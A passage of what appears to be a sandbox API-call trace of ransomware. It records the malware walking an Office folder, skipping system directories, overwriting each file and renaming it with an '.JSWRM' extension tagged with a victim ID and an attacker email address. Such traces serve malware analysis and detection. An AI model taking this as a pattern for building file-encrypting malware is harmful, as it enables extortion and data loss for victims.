dwFlags=0x0, lpWideCharStr="VISIO_STD.HXS", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD.HXS", lpUsedDefaultChar=0x0) returned 13 [0122.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0122.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0122.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.450] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=309164) returned 1 [0122.450] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.450] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.464] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.464] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.464] CloseHandle (hObject=0x238) returned 1 [0122.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0122.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0122.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.465] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0122.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.466] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4855a5d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4855a5d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_STD_COL.HXC", cAlternateFileName="VISIO_~3.HXC")) returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2=".") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="..") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="...") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="windows") returned -1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="recovery") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="perflogs") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="documents and settings") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="system volume information") returned 1 [0122.466] lstrcmpiW (lpString1="VISIO_STD_COL.HXC", lpString2="msocache") returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0122.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXC", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_COL.HXC", lpUsedDefaultChar=0x0) returned 17 [0122.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0122.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXC", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_COL.HXC", lpUsedDefaultChar=0x0) returned 17 [0122.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0122.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0122.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.467] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=651) returned 1 [0122.467] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0122.467] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0122.469] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.469] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0122.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.469] CloseHandle (hObject=0x238) returned 1 [0122.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0122.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0122.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0122.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0122.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0122.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0122.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0122.470] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4855a5d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4855a5d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_STD_COL.HXT", cAlternateFileName="VISIO_~3.HXT")) returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2=".") returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="..") returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="...") returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="windows") returned -1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="recovery") returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="perflogs") returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="documents and settings") returned 1 [0122.470] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0122.471] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="system volume information") returned 1 [0122.471] lstrcmpiW (lpString1="VISIO_STD_COL.HXT", lpString2="msocache") returned 1 [0122.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXT", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0122.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXT", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_COL.HXT", lpUsedDefaultChar=0x0) returned 17 [0122.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXT", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_COL.HXT", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_COL.HXT", lpUsedDefaultChar=0x0) returned 17 [0122.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0122.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.472] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=209) returned 1 [0122.472] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0122.472] ReadFile (in: hFile=0x238, lpBuffer=0x22ea18, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0122.516] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.516] WriteFile (in: hFile=0x238, lpBuffer=0x22ea18*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0122.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0122.517] CloseHandle (hObject=0x238) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0122.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0122.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0122.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0122.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.517] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0122.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0122.519] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4855a5d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4855a5d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_STD_F_COL.HXK", cAlternateFileName="VIB8A9~1.HXK")) returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2=".") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="..") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="...") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="windows") returned -1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="recovery") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="perflogs") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="documents and settings") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="system volume information") returned 1 [0122.519] lstrcmpiW (lpString1="VISIO_STD_F_COL.HXK", lpString2="msocache") returned 1 [0122.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0122.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x2413d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_F_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_F_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: 